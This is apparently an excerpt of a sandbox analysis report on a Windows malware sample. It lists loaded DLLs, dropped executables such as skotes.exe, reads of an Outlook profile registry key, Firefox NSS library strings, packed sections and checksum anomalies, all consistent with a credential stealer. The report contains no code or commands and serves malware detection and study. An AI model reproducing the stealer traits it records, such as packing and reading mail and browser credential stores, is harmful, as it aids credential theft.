Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\choice.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1847808 > 1048576

Source: file.exe

Static PE information: Raw size of oovdzvsf is bigger than: 0x100000 < 0x1a9600

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2032674785.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000003D.00000002.2936107162.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579771535.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 0000003D.00000002.2935612132.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579730177.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000003D.00000000.2579616799.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2934811413.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000003D.00000002.2935612132.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579730177.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000003D.00000002.2935612132.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579730177.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 0000003D.00000002.2935612132.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579730177.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000003D.00000002.2936107162.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579771535.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDB source: svchost.exe, 0000003D.00000002.2935612132.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579730177.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2032674785.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000003D.00000002.2936107162.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579771535.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000003D.00000000.2579616799.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2934811413.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 0000003D.00000002.2936107162.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579771535.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000003D.00000002.2935612132.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579730177.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000003D.00000000.2579616799.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2934811413.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000003D.00000002.2936107162.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579771535.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000003D.00000002.2936107162.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579771535.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 0000003D.00000002.2935612132.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579730177.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000003D.00000000.2579616799.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2934811413.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000003D.00000002.2936107162.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579771535.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.1d0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;oovdzvsf:EW;lmbmcfaf:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;oovdzvsf:EW;lmbmcfaf:EW;.taggant:EW;
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Unpacked PE file: 9.2.DocumentsHDGDGHCAAK.exe.680000.0.unpack :EW;.rsrc:W;.idata :W;sxcussbd:EW;nssdjnnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;sxcussbd:EW;nssdjnnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 10.2.skotes.exe.7b0000.0.unpack :EW;.rsrc:W;.idata :W;sxcussbd:EW;nssdjnnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;sxcussbd:EW;nssdjnnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 11.2.skotes.exe.7b0000.0.unpack :EW;.rsrc:W;.idata :W;sxcussbd:EW;nssdjnnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;sxcussbd:EW;nssdjnnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 12.2.skotes.exe.7b0000.0.unpack :EW;.rsrc:W;.idata :W;sxcussbd:EW;nssdjnnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;sxcussbd:EW;nssdjnnb:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.12.dr	Static PE information: real checksum: 0x3128a1 should be: 0x316928
Source: 96b31e1a32.exe.12.dr	Static PE information: real checksum: 0x3128a1 should be: 0x316928
Source: 8490cd1d50.exe.12.dr	Static PE information: real checksum: 0x1ccb7e should be: 0x1c5979
Source: test2[1].exe.12.dr	Static PE information: real checksum: 0x0 should be: 0x2d3644
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x322805 should be: 0x326833
Source: test2.exe.12.dr	Static PE information: real checksum: 0x0 should be: 0x2d3644
Source: c511421282.exe.12.dr	Static PE information: real checksum: 0x2a53e3 should be: 0x2ae3d1
Source: random[1].exe0.12.dr	Static PE information: real checksum: 0x1ccb7e should be: 0x1c5979
Source: file.exe	Static PE information: real checksum: 0x1ccb7e should be: 0x1c5979
Source: skotes.exe.9.dr	Static PE information: real checksum: 0x322805 should be: 0x326833
Source: ekteefutuwre.exe.13.dr	Static PE information: real checksum: 0x0 should be: 0x2d3644
Source: random[2].exe.12.dr	Static PE information: real checksum: 0x2a53e3 should be: 0x2ae3d1
Source: DocumentsHDGDGHCAAK.exe.0.dr	Static PE information: real checksum: 0x322805 should be: 0x326833

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: oovdzvsf
Source: file.exe	Static PE information: section name: lmbmcfaf
Source: file.exe	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name: sxcussbd
Source: random[1].exe.0.dr	Static PE information: section name: nssdjnnb
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: DocumentsHDGDGHCAAK.exe.0.dr	Static PE information: section name:
Source: DocumentsHDGDGHCAAK.exe.0.dr	Static PE information: section name: .idata
Source: DocumentsHDGDGHCAAK.exe.0.dr	Static PE information: section name: sxcussbd
Source: DocumentsHDGDGHCAAK.exe.0.dr	Static PE information: section name: nssdjnnb
Source: DocumentsHDGDGHCAAK.exe.0.dr	Static PE information: section name: .taggant
Source: skotes.exe.9.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name: .idata
Source: skotes.exe.9.dr	Static PE information: section name: sxcussbd
Source: skotes.exe.9.dr	Static PE information: section name: nssdjnnb
Source: skotes.exe.9.dr	Static PE information: section name: .taggant
Source: random[1].exe.12.dr	Static PE information: section name:
Source: random[1].exe.12.dr	Static PE information: section name: .idata
Source: random[1].exe.12.dr	Static PE information: section name: gjurczzz
Source: random[1].exe.12.dr	Static PE information: section name: jwharnkx
Source: random[1].exe.12.dr	Static PE information: section name: .taggant
Source: 96b31e1a32.exe.12.dr	Static PE information: section name:
Source: 96b31e1a32.exe.12.dr	Static PE information: section name: .idata
Source: 96b31e1a32.exe.12.dr	Static PE information: section name: gjurczzz
Source: 96b31e1a32.exe.12.dr	Static PE information: section name: jwharnkx
Source: 96b31e1a32.exe.12.dr	Static PE information: section name: .taggant
Source: random[1].exe0.12.dr	Static PE information: section name:
Source: random[1].exe0.12.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.12.dr	Static PE information: section name: .idata
Source: random[1].exe0.12.dr	Static PE information: section name:
Source: random[1].exe0.12.dr	Static PE information: section name: oovdzvsf
